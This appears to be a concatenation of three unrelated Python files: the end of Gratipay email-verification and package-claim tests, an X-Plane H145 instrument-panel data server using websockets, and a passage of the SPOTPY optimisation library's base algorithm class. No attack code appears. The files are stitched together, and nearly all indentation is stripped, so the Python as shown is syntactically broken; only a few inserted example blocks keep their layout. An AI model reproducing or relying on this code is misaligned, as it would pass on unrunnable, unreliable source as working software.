assert output[:2] == ['Okay, you asked for it!', '2']
assert errors == [ ' 1 queuing for alice@example.com (alice={})'.format(alice.id)
, ' 2 queuing for bob@example.com (bob={})'.format(bob.id)
]
assert self.count_email_messages() == 2
def test_constrains_to_one_participant(self):
self.make_participant_with_exchange('alice')
bob = self.make_participant_with_exchange('bob')
retcode, output, errors = self.queue_branch_email('bob')
assert retcode == 0
assert output == [ 'Okay, just bob.'
, '1'
, 'spotcheck: bob@example.com (bob={})'.format(bob.id)
]
assert errors == [' 1 queuing for bob@example.com (bob={})'.format(bob.id)]
assert self.count_email_messages() == 1
def test_bails_if_told_to(self):
retcode, output, errors = self.queue_branch_email('all', _input=lambda prompt: 'n')
assert retcode == 1
assert output == []
assert errors == []
assert self.count_email_messages() == 0
class StartEmailVerification(Alice):
def test_starts_email_verification(self):
self.alice.start_email_verification('alice@example.com')
assert self.get_last_email()['subject'] == 'Connect to alice on Gratipay?'
def test_raises_if_already_verified(self):
self.add(self.alice, 'alice@example.com')
raises(EmailAlreadyVerified, self.alice.start_email_verification, 'alice@example.com')
def test_raises_if_already_taken(self):
self.add(self.alice, 'alice@example.com')
bob = self.make_participant('bob', claimed_time='now')
raises(EmailTaken, bob.start_email_verification, 'alice@example.com')
def test_maxes_out_at_10(self):
for i in range(10):
self.add(self.alice, 'alice-{}@example.com'.format(i), _flush=True)
raises(TooManyEmailAddresses, self.alice.start_email_verification, 'alice@example.com')
def test_can_include_packages_in_verification(self):
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
assert self.get_last_email()['subject'] == 'Connect to alice on Gratipay?'
assert self.db.one('select package_id from claims') == foo.id
def test_can_claim_package_even_when_address_already_verified(self):
self.add(self.alice, 'alice@example.com')
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
assert self.get_last_email()['subject'] == 'Connect to alice on Gratipay?'
assert self.db.one('select package_id from claims') == foo.id
def test_claiming_package_with_verified_address_doesnt_count_against_max(self):
for i in range(10):
self.add(self.alice, 'alice-{}@example.com'.format(i), _flush=True)
foo = self.make_package(emails=['alice-4@example.com'])
self.alice.start_email_verification('alice-4@example.com', foo)
assert self.db.one('select package_id from claims') == foo.id
def test_claiming_package_with_someone_elses_verified_address_is_a_no_go(self):
self.add(self.alice, 'alice@example.com')
bob = self.make_participant('bob', claimed_time='now')
foo = self.make_package()
raises(EmailTaken, bob.start_email_verification, 'alice@example.com', foo)
def test_claiming_package_with_an_address_not_on_file_is_a_no_go(self):
foo = self.make_package(emails=['bob@example.com'])
raises(EmailNotOnFile, self.alice.start_email_verification, 'alice@example.com', foo)
def test_restarting_verification_clears_old_claims(self):
foo = self.make_package()
_start = lambda: self.alice.start_email_verification('alice@example.com', foo)
_nonce = lambda: self.db.one('select nonce from claims')
_start()
nonce = _nonce()
_start()
result = self.alice.finish_email_verification('alice@example.com', nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
assert nonce != _nonce()
def test_restarting_verification_also_clears_old_claims_when_address_preverified(self):
foo = self.make_package()
self.add_and_verify_email(self.alice, 'alice@example.com')
_start = lambda: self.alice.start_email_verification('alice@example.com', foo)
_nonce = lambda: self.db.one('select nonce from claims')
_start()
nonce = _nonce()
_start()
result = self.alice.finish_email_verification('alice@example.com', nonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
assert nonce != _nonce()
def test_finishing_verification_clears_competing_claims_and_emails(self):
bob = self.make_participant('bob', claimed_time='now')
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
anonce = self.alice.get_emails()[0].nonce
bob.start_email_verification('alice@example.com', foo)
bnonce = bob.get_emails()[0].nonce
_emails = lambda: self.db.all('select participant_id as i from email_addresses order by i')
_claims = lambda: dict(self.db.all('select nonce, package_id from claims'))
assert _claims() == {anonce: foo.id, bnonce: foo.id}
assert _emails() == [self.alice.id, bob.id]
result = self.alice.finish_email_verification('alice@example.com', anonce)
assert result == (_email.VERIFICATION_SUCCEEDED, [foo], True)
assert _claims() == {}
assert _emails() == [self.alice.id]
result = bob.finish_email_verification('alice@example.com', bnonce)
assert result == (_email.VERIFICATION_FAILED, None, None)
class RemoveEmail(Alice):
def test_removing_email_clears_claims(self):
foo = self.make_package()
self.alice.start_email_verification('alice@example.com', foo)
_claims = lambda: self.db.all('select package_id from claims')
assert _claims() == [foo.id]
self.alice.remove_email('alice@example.com')
assert _claims() == []
class GetEmailVerificationLink(Harness):
def get_claims(self):
return self.db.all('''
SELECT name
FROM claims c
JOIN packages p
ON c.package_id = p.id
ORDER BY name
''')
def test_returns_a_link(self):
with self.db.get_cursor() as c:
alice = self.make_participant('alice')
link = alice.get_email_verification_link(c, 'alice@example.com')
assert link.startswith('/~alice/emails/verify.html?email=YWxpY2VAZXhhbXBsZS5jb20~&nonce=')
def test_makes_no_claims_by_default(self):
with self.db.get_cursor() as c:
self.make_participant('alice').get_email_verification_link(c, 'alice@example.com')
assert self.get_claims() == []
def test_makes_a_claim_if_asked_to(self):
alice = self.make_participant('alice')
foo = self.make_package()
with self.db.get_cursor() as c:
alice.get_email_verification_link(c, 'alice@example.com', foo)
assert self.get_claims() == ['foo']
def test_can_make_two_claims(self):
alice = self.make_participant('alice')
foo = self.make_package()
bar = self.make_package(name='bar')
with self.db.get_cursor() as c:
alice.get_email_verification_link(c, 'alice@example.com', foo, bar)
assert self.get_claims() == ['bar', 'foo']
def test_will_happily_make_competing_claims(self):
foo = self.make_package()
with self.db.get_cursor() as c:
self.make_participant('alice').get_email_verification_link(c, 'alice@example.com', foo)
with self.db.get_cursor() as c:
self.make_participant('bob').get_email_verification_link(c, 'bob@example.com', foo)
assert self.get_claims() == ['foo', 'foo']
def test_adds_events(self):
foo = self.make_package()
with self.db.get_cursor() as c:
self.make_participant('alice').get_email_verification_link(c, 'alice@example.com', foo)
events = [e.payload['action'] for e in self.db.all('select * from events order by id')]
assert events == ['add', 'start-claim']
class VerificationBase(Alice):
def check(self, *package_names, **kw):
packages = [self.make_package(name=n) for n in package_names]
self.alice.start_email_verification('alice@example.com', *packages)
message = self.get_last_email()
return message['subject'], message['body_html'], message['body_text']
def preverify(self, address='alice@example.com'):
self.alice.start_email_verification(address)
nonce = self.alice.get_email(address).nonce
self.alice.finish_email_verification(address, nonce)
class VerificationMessage(VerificationBase):
def check(self, *a, **kw):
subject, html, text = VerificationBase.check(self, *a, **kw)
assert subject == 'Connect to alice on Gratipay?'
return html, text
def test_chokes_on_just_verified_address(self):
self.preverify()
raises(EmailAlreadyVerified, self.check)
def test_handles_just_address(self):
html, text = self.check()
assert ' connect <b>alice@example.com</b> to ' in html
assert ' connect alice@example.com to ' in text
# NB: The next two also exercise skipping the verification notice when
# sending package verification to an already-verified address, since the
# last email sent would be the verification notice if we didn't skip it.
def test_handles_verified_address_and_one_package(self):
self.preverify()
html, text = self.check('foo')
assert ' connect the <b>foo</b> npm package ' in html
assert ' connect the foo npm package ' in text
def test_handles_verified_address_and_multiple_packages(self):
self.preverify()
html, text = self.check('foo', 'bar')
assert ' connect 2 npm packages ' in html
assert ' connect 2 npm packages ' in text
def test_handles_unverified_address_and_one_package(self):
html, text = self.check('foo')
assert ' <b>alice@example.com</b> and the <b>foo</b> npm package ' in html
assert ' alice@example.com and the foo npm package ' in text
def test_handles_unverified_address_and_multiple_packages(self):
html, text = self.check('foo', 'bar')
assert ' <b>alice@example.com</b> and 2 npm packages ' in html
assert ' alice@example.com and 2 npm packages ' in text
class VerificationNotice(VerificationBase):
def setUp(self):
VerificationBase.setUp(self)
self.preverify('alice@gratipay.com')
def check(self, *a, **kw):
subject, html, text = VerificationBase.check(self, *a, **kw)
assert subject == 'New activity on your account'
assert ' notification sent to <b>alice@gratipay.com</b> because' in html
assert ' notification sent to alice@gratipay.com because' in text
return html, text
def test_sends_notice_for_new_address(self):
html, text = self.check()
assert ' connecting <b>alice@example.com</b> to ' in html
assert ' connecting alice@example.com to ' in text
def test_sends_notice_for_verified_address_and_one_package(self):
self.preverify()
html, text = self.check('foo')
assert ' connecting the <b>foo</b> npm package ' in html
assert ' connecting the foo npm package to ' in text
def test_sends_notice_for_verified_address_and_multiple_packages(self):
self.preverify()
html, text = self.check('foo', 'bar')
assert ' connecting 2 npm packages ' in html
assert ' connecting 2 npm packages ' in text
def test_sends_notice_for_unverified_address_and_one_package(self):
html, text = self.check('foo')
assert ' connecting <b>alice@example.com</b> and the <b>foo</b> npm package ' in html
assert ' connecting alice@example.com and the foo npm package ' in text
def test_sends_notice_for_unverified_address_and_multiple_packages(self):
html, text = self.check('foo', 'bar')
assert ' connecting <b>alice@example.com</b> and 2 npm packages ' in html
assert ' connecting alice@example.com and 2 npm packages ' in text
class PackageLinking(VerificationBase):
address = 'alice@example.com'
def start(self, address, *package_names):
packages = [self.make_package(name=name, emails=[address]) for name in package_names]
self.alice.start_email_verification(address, *packages)
return self.alice.get_email(address).nonce
@mock.patch('gratipay.project_review_process.ConsolePoster.post')
def check(self, *package_names):
package_names, post = package_names[:-1], package_names[-1]
post.return_value = 'some-github-url'
nonce = self.start(self.address, *package_names)
result = self.alice.finish_email_verification(self.address, nonce)
# email?
packages = [Package.from_names(NPM, name) for name in package_names]
assert result == (_email.VERIFICATION_SUCCEEDED, packages, True if packages else None)
assert self.alice.email_address == P('alice').email_address == self.address
# database?
for name in package_names:
package = Package.from_names(NPM, name)
assert package.team.package == package
assert package.team.review_url == 'some-github-url'
# GitHub issue?
npackages = len(package_names)
if npackages == 0:
assert not post.called
else:
assert post.call_count == 1
posted = json.loads(post.mock_calls[0][1][0])
if npackages == 1:
assert posted['title'] == 'foo'
assert 'for at least a week' in posted['body']
else:
assert posted['title'] == 'bar and foo'
assert 'for at least a week' in posted['body']
assert self.db.all('select review_url from teams') == ['some-github-url'] * npackages
def test_preverify_preverifies(self):
assert self.alice.email_address is None
self.preverify()
assert self.alice.email_address == self.address
def test_unverified_address_and_no_packages_succeeds(self):
self.check()
def test_unverified_address_and_one_package_succeeds(self):
self.check('foo')
def test_unverified_address_and_multiple_packages_succeeds(self):
self.check('bar', 'foo')
def test_verified_address_and_no_packages_is_a_no_go(self):
self.preverify()
raises(EmailAlreadyVerified, self.check)
def test_verified_address_and_one_package_succeeds(self):
self.preverify()
self.check('foo')
def test_verified_address_and_multiple_packages_succeeds(self):
self.preverify()
self.check('bar', 'foo')
def test_bob_cannot_steal_a_package_claim_from_alice(self):
foo = self.make_package()
self.alice.start_email_verification(self.address, foo)
nonce = self.alice.get_email(self.address).nonce
# u so bad bob!
bob = self.make_participant('bob', claimed_time='now')
bob.start_email_verification(self.address, foo)
result = bob.finish_email_verification(self.address, nonce) # using alice's nonce, even!
assert result == (_email.VERIFICATION_FAILED, None, None)
assert len(bob.get_teams()) == 0
result = self.alice.finish_email_verification(self.address, nonce)
assert result == (_email.VERIFICATION_SUCCEEDED, [foo], True)
teams = self.alice.get_teams()
assert len(teams) == 1
assert teams[0].package == foo
def test_while_we_are_at_it_that_packages_have_unique_teams_that_survive_comparison(self):
self.test_verified_address_and_multiple_packages_succeeds()
foo = Package.from_names('npm', 'foo')
bar = Package.from_names('npm', 'bar')
assert foo.team == foo.team
assert bar.team == bar.team
assert foo.team != bar.team
def test_finishing_email_verification_with_preexisting_paypal_doesnt_update_paypal(self):
self.add_and_verify_email(self.alice, self.address)
self.alice.set_paypal_address(self.address)
nonce = self.start(self.address, 'foo')
result = self.alice.finish_email_verification(self.address, nonce)
foo = Package.from_names('npm', 'foo')
assert result == (_email.VERIFICATION_SUCCEEDED, [foo], False)
def test_deleting_package_removes_open_claims(self):
self.add_and_verify_email(self.alice, self.address)
self.alice.set_paypal_address(self.address)
self.start(self.address, 'foo')
_load = lambda: self.db.one('select * from claims')
assert _load() is not None
Package.from_names('npm', 'foo').delete()
assert _load() is None
def test_finishing_email_verification_is_thread_safe(self):
foo = self.make_package()
self.alice.start_email_verification(self.address, foo)
nonce = self.alice.get_email(self.address).nonce
results = {}
def finish():
key = threading.current_thread().ident
results[key] = self.alice.finish_email_verification(self.address, nonce)
def t():
t = threading.Thread(target=finish)
t.daemon = True
return t
go = Queue.Queue()
def monkey(self, *a, **kw):
team = old_get_or_create_linked_team(self, *a, **kw)
go.get()
return team
old_get_or_create_linked_team = Package.get_or_create_linked_team
Package.get_or_create_linked_team = monkey
try:
a, b = t(), t()
a.start()
b.start()
go.put('')
go.put('')
b.join()
a.join()
finally:
Package.get_or_create_linked_team = old_get_or_create_linked_team
assert results[a.ident] == (_email.VERIFICATION_SUCCEEDED, [foo], True)
assert results[b.ident] == (_email.VERIFICATION_REDUNDANT, None, None)
|
dataReceiver.py
|
#!/usr/bin/env python
# windows : pyinstaller -F dataReceiver.py --noupx --hidden-import graphics --hidden-import websockets --noconsole
import xpc
import json
import socket
import http.server
import socketserver
import webbrowser
import threading
import asyncio
import websockets
import graphics
import time
import types
app = types.SimpleNamespace()
app.name = "H145 panel"
app.connected_to_xplane = False
app.ip_address = "127.0.0.1"
app.http_port = 8080
app.ws_port = 8081
def check_xplane_connection():
while True:
print("Trying to connect to X-Plane...")
client = xpc.XPlaneConnect()
try:
# If X-Plane does not respond to the request, a timeout error
# will be raised.
client.getDREF("sim/test/test_float")
#
app.connected_to_xplane = True
return
except Exception:  # keep retrying on any connection or timeout error
print("Error establishing connection to X-Plane.")
print("Retrying...")
time.sleep(10)
def window_connecting():
win = graphics.GraphWin('H145 External Panel', 350, 350) # give title and dimensions
xplane = graphics.Text(graphics.Point(60, 20), 'X-Plane 11 : ')
connected_message = 'Not connected'
connected = graphics.Text(graphics.Point(160, 20), connected_message)
connected.setTextColor('red')
xplane.draw(win)
connected.draw(win)
check_xplane_connection()
win.close()
window_connected()
def window_connected():
win = graphics.GraphWin('H145 External Panel', 350, 350) # give title and dimensions
xplane = graphics.Text(graphics.Point(60, 20), 'X-Plane 11 : ')
connected_message = 'Connected'
connected = graphics.Text(graphics.Point(160, 20), connected_message)
connected.setTextColor('green')
xplane.draw(win)
connected.draw(win)
open_browser = graphics.Text(graphics.Point(win.getWidth() / 2, 100), 'Open in browser\n\nor')
open_browser.draw(win)
open_device = graphics.Text(graphics.Point(win.getWidth() / 2, 180),
"digit the following into a web browser :\n\n http://" + str(app.ip_address) + ":" + str(
app.http_port) + "/app/")
open_device.draw(win)
while app.connected_to_xplane:
point = win.getMouse()
if 110 < point.getX() < 240 and 70 < point.getY() < 95:
url = "http://" + str(app.ip_address) + ":" + str(app.http_port) + "/app/index.html"
webbrowser.open(url, new=2)
win.close()
window_connecting()
async def send_data(websocket, path):
print("Connection to X-Plane", flush=True)
while not app.connected_to_xplane:
await asyncio.sleep(1)
client1 = xpc.XPlaneConnect()
grossWt = "sim/flightmodel/weight/m_total"
totalFuel = "sim/flightmodel/weight/m_fuel_total"
egt = "sim/flightmodel2/engines/ITT_deg_C"
n1 = "sim/cockpit2/engine/indicators/N1_percent"
n2 = "sim/cockpit2/engine/indicators/N2_percent"
tq = "sim/cockpit2/engine/indicators/torque_n_mtr"
oilPress = "sim/cockpit2/engine/indicators/oil_pressure_psi"
fuelTanks = "sim/flightmodel/weight/m_fuel"
fuelFlow = "sim/cockpit2/engine/indicators/fuel_flow_kg_sec"
oilTemp = "sim/cockpit2/engine/indicators/oil_temperature_deg_C"
oilQty = "sim/flightmodel/engine/ENGN_oil_quan"
lat = "sim/flightmodel/position/latitude"
lon = "sim/flightmodel/position/longitude"
hdg = "sim/flightmodel/position/true_psi"
hyd1 = "sim/cockpit2/hydraulics/indicators/hydraulic_pressure_1"
hyd2 = "sim/cockpit2/hydraulics/indicators/hydraulic_pressure_2"
gen = "sim/cockpit2/electrical/generator_amps"
genOn = "sim/cockpit/electrical/generator_on"
bat = "sim/cockpit2/electrical/battery_voltage_actual_volts"
mgbPress = "sim/flightmodel/transmissions/xmsn_press"
mgbTemp = "sim/flightmodel/transmissions/xmsn_temp"
payload = "sim/flightmodel/weight/m_fixed"
pressure = "sim/weather/barometer_current_inhg"
temperature = "sim/weather/temperature_ambient_c"
while True:
values = dict()
try:
res = client1.getDREFs([egt, n1, n2, tq, fuelTanks, fuelFlow, oilTemp, oilPress, oilQty, lat, lon, hyd1, hyd2, genOn, gen, bat, mgbTemp, mgbPress, hdg, grossWt, totalFuel, payload, pressure, temperature])
values["egt_1"] = round(res[0][0], 0)
values["egt_2"] = round(res[0][1], 0)
values["n1_1"] = "{:.1f}".format(round(res[1][0], 1))
values["n1_2"] = "{:.1f}".format(round(res[1][1], 1))
values["n2_1"] = "{:.1f}".format(abs(round(res[2][0], 1)))
values["n2_2"] = "{:.1f}".format(abs(round(res[2][1], 1)))
values["trq_1"] = "{:.1f}".format(abs(round(res[3][0]/118.5, 1)))
values["trq_2"] = "{:.1f}".format(abs(round(res[3][1]/118.5, 1)))
values["fuel_0"] = round(res[4][0] / 2, 0)
values["fuel_1"] = round(res[4][1], 0)
values["fuel_2"] = round(res[4][0] / 2, 0)
values["fuelf_0"] = round(res[5][0] * 3600 / 2, 0)
values["fuelf_1"] = round(res[5][1] * 3600 / 2, 0)
values["oiltemp_1"] = "{:.1f}".format(round(res[6][0], 1))
values["oiltemp_2"] = "{:.1f}".format(round(res[6][1], 1))
values["oilpress_1"] = round(res[7][0], 1)
values["oilpress_2"] = round(res[7][1], 1)
values["oil_1"] = round(res[8][0], 1)
values["oil_2"] = round(res[8][1], 1)
values["lat"] = round(res[9][0], 4)
values["lon"] = round(res[10][0], 4)
values["hyd_1"] = round(res[11][0], 2)
values["hyd_2"] = round(res[12][0], 2)
values["gen_1"] = res[13][0]
values["gen_2"] = res[13][1]
values["genamps_1"] = "{:.1f}".format(round(res[14][0], 1))
values["genamps_2"] = "{:.1f}".format(round(res[14][1], 1))
values["bat"] = "{:.1f}".format(round(res[15][0], 1))
values["mgb_t"] = "{:.1f}".format(round(res[16][0], 1))
values["mgb_p"] = "{:.1f}".format(round(res[17][0], 1))
values["hdg"] = "{:0>3.0f}".format(round(res[18][0], 0))
values["weight"] = round(res[19][0], 0)
values["fuel_t"] = round(res[20][0], 0)
values["weight_p"] = round(res[21][0], 0)
values["weight_e"] = round(res[19][0] - res[20][0] - res[21][0], 0)
values["pressure"] = "{:.2f}".format(res[22][0])
values["temperature"] = "{:.1f}".format(res[23][0])
except ValueError:
print("ValueError, reconnecting to X-Plane")
values = {}
except socket.timeout:
print("Socket timeout")
values = {}
except Exception as inst:
print(type(inst))
print(inst.args)
#client = xpc.XPlaneConnect()
continue
json_val = json.dumps(values)
await websocket.send(json_val)
await asyncio.sleep(0.10)
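# Hedged example (not part of the original script): a minimal sketch of a client for the
# websocket stream produced by send_data() above. The URI below mirrors the default
# app.ip_address/app.ws_port values and is an assumption for illustration only.
async def demo_receive_one(uri="ws://127.0.0.1:8081"):
    async with websockets.connect(uri) as ws:
        message = await ws.recv()  # one JSON snapshot, pushed roughly every 0.1 s
        values = json.loads(message)
        print(values.get("n1_1"), values.get("hdg"))
# Usage sketch: asyncio.get_event_loop().run_until_complete(demo_receive_one())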
def main():
app.connected_to_xplane = False
app.ip_address = socket.gethostbyname(socket.gethostname())
print("H145panel connecting to sim")
f_conf = open("app/conf.json", "w")
json.dump({"ip": app.ip_address, "port": app.ws_port}, f_conf)
f_conf.close()
print("computer address %s" % app.ip_address)
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", app.http_port), handler)
print("serving at port", app.http_port)
threading.Thread(target=httpd.serve_forever, daemon=True).start()
start_server = websockets.serve(send_data, app.ip_address, app.ws_port)
asyncio.get_event_loop().run_until_complete(start_server)
threading.Thread(target=asyncio.get_event_loop().run_forever, daemon=True).start()
window_connecting()
if __name__ == "__main__":
main()
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database, objectivefunctions
from spotpy import parameter
import numpy as np
import time
import threading
try:
from queue import Queue
except ImportError:
# On Python 2.* only the old Queue module is available. There the main process has to sleep
# for a moment so that the subprocess can finish and be garbage-collected before the main
# process accesses it. This slows the whole simulation down and is an annoying workaround;
# Python 3.x does not need it.
from Queue import Queue
class _RunStatistic(object):
"""
This class checks for each run whether the objectivefunction improved and holds the
best parameter set.
Every _algorithm has an object of this class as its status.
Usage:
status = _RunStatistic()
status(rep,like,params)
"""
def __init__(self):
self.rep = 0
self.params = None
self.objectivefunction = -1e308
self.bestrep = 0
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = None
def __call__(self, rep, objectivefunction, params):
self.curparmeterset = params
self.rep+=1
if isinstance(objectivefunction, list):
if objectivefunction[0] > self.objectivefunction:
# Show only the first best objectivefunction when working with
# more than one objectivefunction
self.objectivefunction = objectivefunction[0]
self.params = params
self.bestrep = self.rep
else:
if objectivefunction > self.objectivefunction:
self.params = params
self.objectivefunction = objectivefunction
self.bestrep = self.rep
self.print_status()
def print_status(self):
# build a string showing the approximate time left until the end of the simulation in H:M:S
acttime = time.time()
# Refresh the progress output every two seconds
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
text = '%i of %i (best like=%g) est. time remaining: %s' % (self.rep, self.repetitions,
self.objectivefunction, timestr)
print(text)
self.last_print = time.time()
def __repr__(self):
return 'Best objectivefunction: %g' % self.objectivefunction
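# Hedged example (not part of the original SPOTPY source): a minimal sketch of how a sampler
# drives the status object defined above. The likelihood values are made up purely for
# illustration.
def _demo_run_statistic():
    status = _RunStatistic()
    status.repetitions = 3
    for rep, like in enumerate([0.2, 0.7, 0.5]):
        status(rep, like, params=[1.0, 2.0])
    # After three calls the best run is the second one (like=0.7)
    return status.objectivefunction, status.bestrep  # -> (0.7, 2)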
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return a list of simulation results (as long as the evaluation list)
parameter: function
When called, it should return a random parameter combination, which can
be e.g. uniformly or Gaussian distributed
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values, in the same form as returned by the model.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
ram: fast, suited for short sampling times. No file will be created and results are saved in an array.
csv: A csv file will be created, which you can import afterwards.
parallel: str
seq: Sequential sampling (default): normal iterations on one core of your CPU.
mpc: Multiprocessing: iterations on all available cores of your (single) PC
mpi: Message Passing Interface: parallel computing on high-performance computing clusters; mpi4py needs to be installed
save_threshold: float or list
Compares the given value/list of values with the return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database; if not, they are ignored (saves storage).
db_precision:np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
alt_objfun: str or None, default: None
alternative objectivefunction to be used for algorithm
* None: the objfun defined in spot_setup.objectivefunction is used
* any str: if str is found in spotpy.objectivefunctions,
this objectivefunction is used, else falls back to None
e.g.: 'log_p', 'rmse', 'bias', 'kge' etc.
sim_timeout: float, int or None, default: None
the model defined in the spot_setup class can be made to break after 'sim_timeout' seconds if
sim_timeout is not None.
If the model run has been broken off, simply '[nan]' will be returned.
random_state: int or None, default: None
the algorithm uses the number in random_state as a seed for numpy. This way stochastic processes can be reproduced.
"""
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
parallel='seq', save_sim=True, alt_objfun=None, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,sim_timeout = None,
random_state=None):
# Initialize the user defined setup class
self.setup = spot_setup
self.model = self.setup.simulation
# Philipp: Changed from Tobi's version, now we are using both new class defined parameters
# as well as the parameters function. The new method get_parameters
# can deal with a missing parameters function
#
# For me (Philipp) it is totally unclear why all the samplers should call this function
# again and again instead of
# TODO: just storing a definite list of parameter objects here
self.parameter = self.get_parameters
self.parnames = self.parameter()['name']
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.get_namedtuple_from_paramnames(
self.setup, self.parnames)
# use alt_objfun if alt_objfun is defined in objectivefunctions,
# else self.setup.objectivefunction
self.objectivefunction = getattr(
objectivefunctions, alt_objfun or '', None) or self.setup.objectivefunction
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'custom'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
self.dbinit = dbinit
# Set the random state
if random_state is None:
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
# If sim_timeout is not None, a timeout is set so that the simulation breaks after sim_timeout seconds without returning a value
self.sim_timeout = sim_timeout
self.save_threshold = save_threshold
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
self.dbinit = False
self.breakdata = self.read_breakdata(self.dbname)
# Now a repeater (ForEach-object) is loaded
# A repeater is a convenient wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
# MPC is based on pathos multiprocessing and uses an ordered map, so results are returned
# in the same order as the parameters
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
# UMPC is based on pathos multiprocessing and uses an unordered map, so results are returned in the
# order in which the subprocesses finish. This may speed up the whole simulation, but it is not
# recommended if the objective function depends on the order of the data, because the order of the
# results is effectively random.
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
self.status = _RunStatistic()
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
return parameter.get_parameters_array(self.setup)
def set_repetiton(self, repetitions):
self.status.repetitions = repetitions
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
print('End of sampling')
text = 'Best run at %i of %i (best like=%g) with parameter set:' % (
self.status.bestrep, self.status.repetitions, self.status.objectivefunction)
print(text)
print(self.status.params)
text = 'Duration:' + str(round((time.time() - self.status.starttime), 2)) + ' s'
print(text)
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations, save_sim=self.save_sim,
dbinit=self.dbinit, db_precision=self.db_precision, setup=self.setup)
self.dbinit = False
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
# If like is a list of values, compare it element-wise with the save_threshold setting
try:
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
# If like is not an iterable, it is assumed to be a float
except TypeError:  # also reached if no threshold was set
try:
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
except TypeError:# float/list would result in an error, because it does not make sense
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
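# Hedged illustration (not part of the original source) of the three comparison branches
# handled above, assuming the save_threshold semantics documented in the class docstring:
#   like = 0.9,        save_threshold = 0.5          -> float/float branch, run is saved
#   like = [0.9, 0.8], save_threshold = [0.5, 0.5]   -> list/list branch,   run is saved
#   like = [0.9],      save_threshold = 0.5          -> list/float branch,  run is saved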
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
return pickle.load(breakfile)
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
def getdata(self):
return self.datawriter.getdata()
def postprocessing(self, rep, randompar, simulation, chains=1, save=True, negativlike=False):
like = self.getfitness(simulation=simulation, params=randompar)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
if save is True:
if negativlike is True:
self.save(-like, randompar, simulations=simulation, chains=chains)
self.status(rep, -like, randompar)
else:
self.save(like, randompar, simulations=simulation, chains=chains)
self.status(rep, like, randompar)
if isinstance(like, list):
return like[0]
else:
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError:  # Happens if the user's spot_setup.objectivefunction does not accept a params argument
#print('Not using parameters in fitness function')
return self.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed because parallel execution
may return runs out of order.
"""
id, params = id_params_tuple
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.model(self.partype(*params)))
# Start a queue. On Python 2.7 this is a multiprocessing class and can cause errors because of
# incompatibility with the main thread; hence the workaround in the import section above for older Python versions.
que = Queue()
